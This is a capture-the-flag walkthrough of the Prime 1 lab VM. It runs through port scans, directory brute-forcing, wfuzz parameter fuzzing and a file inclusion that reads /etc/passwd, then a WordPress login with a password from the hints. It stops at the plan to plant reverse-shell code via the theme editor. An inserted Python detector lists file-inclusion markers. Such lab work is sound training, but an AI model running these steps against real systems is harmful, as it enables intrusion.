Target practice notes: Prime 1

https://www.vulnhub.com/entry/prime-1,358/
Host discovery and port scanning


  • Discover live hosts; .137 is the target
    nmap -sP 192.168.75.0/24

    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 16:25 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00028s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00026s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.137
    Host is up (0.0010s latency).
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:F8:B3:1A (VMware)
    Nmap scan report for 192.168.75.131
    Host is up.
  • Scan all open ports on the target
    nmap -sT --min-rate 10000 -p- 192.168.75.137

    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:54 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.0014s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:69:EE:71 (VMware)
  • Scan service versions and the OS version
    nmap -sT -sV -O -p22,80 192.168.75.137

    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.00045s latency).
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  • UDP scan
    nmap -sU 192.168.75.137

    Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
    Nmap scan report for 192.168.75.137
    Host is up (0.00073s latency).
    Not shown: 997 closed udp ports (port-unreach)
    PORT     STATE         SERVICE
    68/udp   open|filtered dhcpc
    631/udp  open|filtered ipp
    5353/udp open|filtered zeroconf
    MAC Address: 00:0C:29:69:EE:71 (VMware)
  • Vulnerability scan
    nmap --script=vuln -p 22,80 192.168.75.137

    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
    | http-slowloris-check:
    |   VULNERABLE:
    |   Slowloris DOS attack
    |     State: LIKELY VULNERABLE
    |     IDs:  CVE:CVE-2007-6750
    |       Slowloris tries to keep many connections to the target web server open and hold
    |       them open as long as possible.  It accomplishes this by opening connections to
    |       the target web server and sending a partial request. By doing so, it starves
    |       the http server's resources causing Denial Of Service.
    |
    |     Disclosure date: 2009-09-17
    |     References:
    |       http://ha.ckers.org/slowloris/
    |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    | http-enum:
    |   /wordpress/: Blog
    |_  /wordpress/wp-login.php: Wordpress login page.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    MAC Address: 00:0C:29:69:EE:71 (VMware)
    The scan turned up a Slowloris DoS (not useful here) and cve2017-1001000, and also found a WordPress installation; its version is
    nikto -host 192.168.75.137 -port 22,80

    - Nikto v2.5.0
    ---------------------------------------------------------------------------
    ---------------------------------------------------------------------------
    + Target IP:          192.168.75.137
    + Target Hostname:    192.168.75.137
    + Target Port:        80
    + Start Time:         2024-09-22 18:44:45 (GMT8)
    ---------------------------------------------------------------------------
    + Server: Apache/2.4.18 (Ubuntu)
    + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
    + /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
    + No CGI Directories found (use '-C all' to force check all possible dirs)
    + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
    + /: Web Server returns a valid response with junk HTTP methods which may cause false positives
    + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
    + /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
    + /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
    + /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.
    + /wordpress/: Drupal Link header found with value: <http://192.168.75.137/wordpress/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/
    + /wordpress/: A Wordpress installation was found.
    + /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
    + /wordpress/wp-content/uploads/: Directory indexing found.
    + /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
    + /wordpress/wp-login.php: Wordpress login found.
    + 8106 requests: 0 error(s) and 14 item(s) reported on remote host
    + End Time:           2024-09-22 18:45:09 (GMT8) (24 seconds)
    ---------------------------------------------------------------------------
    + 1 host(s) tested
  • Directory brute force with dirsearch
    [18:49:23] 200 -  131B  - /dev
    [18:49:25] 200 -  137B  - /image.php
    [18:49:26] 301 -  321B  - /javascript  ->  http://192.168.75.137/javascript/
    [18:49:32] 403 -  279B  - /server-status/
    [18:49:32] 403 -  279B  - /server-status
    [18:49:36] 200 -    1KB - /wordpress/wp-login.php
    [18:49:36] 200 -    4KB - /wordpress/
    Look at /dev, since it is not a directory that should normally be there:
    hello,
    now you are at level 0 stage.
    In real life pentesting we should use our tools to dig on a web very hard.
    Happy hacking.
    Does this mean we should brute-force directories harder?
  • python .\dirsearch.py -u http://192.168.75.137/ --suffixes .txt,.zip (brute force with the .txt and .zip suffixes appended to every wordlist entry)
    http://192.168.75.137/secret.txt
    Viewing its content gives:
    Looks like you have got some secrets.
    Ok I just want to do some help to you.
    Do some more fuzz on every page of php which was finded by you. And if
    you get any right parameter then follow the below steps. If you still stuck
    Learn from here a basic tool with good usage for OSCP.
    https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
    //see the location.txt and you will get your next move//
    Let's do some fuzzing. Roughly, it tells us to fuzz every php file, which means fuzzing out the GET parameters.
  • Enumerate all php files
    dirb http://192.168.75.137 -X .php

    -----------------
    DIRB v2.22
    By The Dark Raver
    -----------------
    START_TIME: Sun Sep 22 20:12:05 2024
    URL_BASE: http://192.168.75.137/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
    -----------------
    GENERATED WORDS: 4612
    ---- Scanning URL: http://192.168.75.137/ ----
    + http://192.168.75.137/image.php (CODE:200|SIZE:147)
    + http://192.168.75.137/index.php (CODE:200|SIZE:136)

    -----------------
    END_TIME: Sun Sep 22 20:12:08 2024
    DOWNLOADED: 4612 - FOUND: 2
    There are only two php files in this directory, so we try both.
  • Fuzz index.php
    Note that --hh 136 has to be adjusted to the situation. After filtering out the other responses, we are left with the parameter file.
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.75.137/index.php?FUZZ=something
    // --hh filters out the responses that are 136 characters long
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    Target: http://192.168.75.137/index.php?FUZZ=something
    Total requests: 951
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================
    000000341:   200        7 L      19 W       206 Ch      "file"
    Total time: 1.060608
    Processed Requests: 951
    Filtered Requests: 950
    Requests/sec.: 896.6547
  • Visit http://192.168.75.137/index.php?file=
    Hint: Do something better you are digging wrong file
    The value of the file parameter probably needs fuzzing as well; actually Burp could do this too.
    But secret.txt had one more line: //see the location.txt and you will get your next move//
    So we visit: http://192.168.75.137/index.php?file=location.txt
    Sure enough, there is information there:
    Now dig some more for next one
    use 'secrettier360' parameter on some other php page for more fun.
    Roughly, it tells us to take the secrettier360 parameter and fuzz another php page with it.
    Apart from index.php, the only other php page is image.php.
  • Fuzz image.php
    wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 197 http://192.168.75.137/image.php?secrettier360=FUZZ
    ********************************************************
    * Wfuzz 3.1.0 - The Web Fuzzer                         *
    ********************************************************
    Target: http://192.168.75.137/image.php?secrettier360=FUZZ
    Total requests: 951
    =====================================================================
    ID           Response   Lines    Word       Chars       Payload
    =====================================================================
    000000257:   200        13 L     43 W       328 Ch      "dev"
    Total time: 1.031432
    Processed Requests: 951
    Filtered Requests: 950
    Requests/sec.: 922.0189
    We get the parameter dev. Try visiting: http://192.168.75.137/image.php?secrettier360=dev
    finaly you got the right parameter
    hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking.
    WTF? Isn't this the /dev from before? But notice: as long as you put a filename into secrettier360, isn't that file inclusion? Here I had the bright idea of trying PHP wrappers, but they could not be used; they must have been disabled.
  • Exploiting the file inclusion vulnerability
    Try reading /etc/passwd
    We find saket:x:1001:1001:find password.txt file in my directory:/home/saket: , nice.
    The password should be follow_the_ippsec
  • Log in to the WordPress dashboard with username victor and password follow_the_ippsec
    Why is the username victor? Because the first post on wordpress/index.php was published by victor, so I guessed the username was victor, and got into the dashboard successfully.
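As an added defender-side example (not part of the original post), the Python script below scans Apache access-log lines for the two behaviours this walkthrough relies on: a burst of different parameter names against one PHP page (the wfuzz FUZZ=something step) and parameter values carrying file-inclusion markers (the secrettier360 step). The log lines, the client IP 192.168.75.131, the marker list and the threshold of 20 distinct names are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Apache common/combined log line (assumed layout of the target's access.log).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Query values that point at local file inclusion (what secrettier360 turned out to accept).
LFI_MARKERS = ("/etc/passwd", "../", "php://", "file://", "expect://")

def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    return {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path,
            "params": parse_qsl(parts.query, keep_blank_values=True),
            "status": int(m.group("status"))}

def find_param_fuzzing(entries, min_distinct=20):
    """Flag (ip, path) pairs that tried many different parameter names, as FUZZ=something does."""
    names = defaultdict(set)
    for e in entries:
        for name, _ in e["params"]:
            names[(e["ip"], e["path"])].add(name)
    return [(ip, path, len(n)) for (ip, path), n in names.items() if len(n) >= min_distinct]

def find_lfi_attempts(entries):
    """Return (ip, path, param, value) for every parameter value carrying an LFI marker."""
    return [(e["ip"], e["path"], name, value)
            for e in entries for name, value in e["params"]
            if any(marker in value for marker in LFI_MARKERS)]

def analyse(log_text):
    """Run both detections over raw log text; unparsable lines are skipped."""
    entries = [p for p in map(parse_line, log_text.splitlines()) if p]
    return {"fuzzing": find_param_fuzzing(entries), "lfi": find_lfi_attempts(entries)}

# Constructed sample log: a parameter-name fuzz against index.php, then inclusion attempts on image.php.
_fmt = '192.168.75.131 - - [22/Sep/2024:20:12:05 +0800] "GET {} HTTP/1.1" {} {}'
SAMPLE_LOG = "\n".join(
    [_fmt.format(f"/index.php?word{i}=something", 200, 136) for i in range(24)]
    + [_fmt.format("/index.php?file=something", 200, 206),
       _fmt.format("/image.php?secrettier360=dev", 200, 328),
       _fmt.format("/image.php?secrettier360=/etc/passwd", 200, 2400),
       _fmt.format("/image.php?secrettier360=php://filter", 200, 197),
       '192.168.75.10 - - [22/Sep/2024:20:15:00 +0800] "GET /wordpress/ HTTP/1.1" 200 4096'])
```

Running `analyse(SAMPLE_LOG)` reports the 25 distinct names thrown at /index.php and the two inclusion attempts on /image.php, while the plain `secrettier360=dev` hit and the /wordpress/ visit stay quiet.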
Exploiting the dashboard to get a low-privilege shell

  • Go into the dashboard: Plugins → Add New → Upload Plugin, and upload a reverse shell file.
  • It turns out there is no upload permission, even after turning off the setting that creates folders by month.
  • Look for somewhere else to place the shell code.
  • Under Appearance → Theme Editor → secret.php there is a file that can be edited and saved.
  • We put the shell code into it.
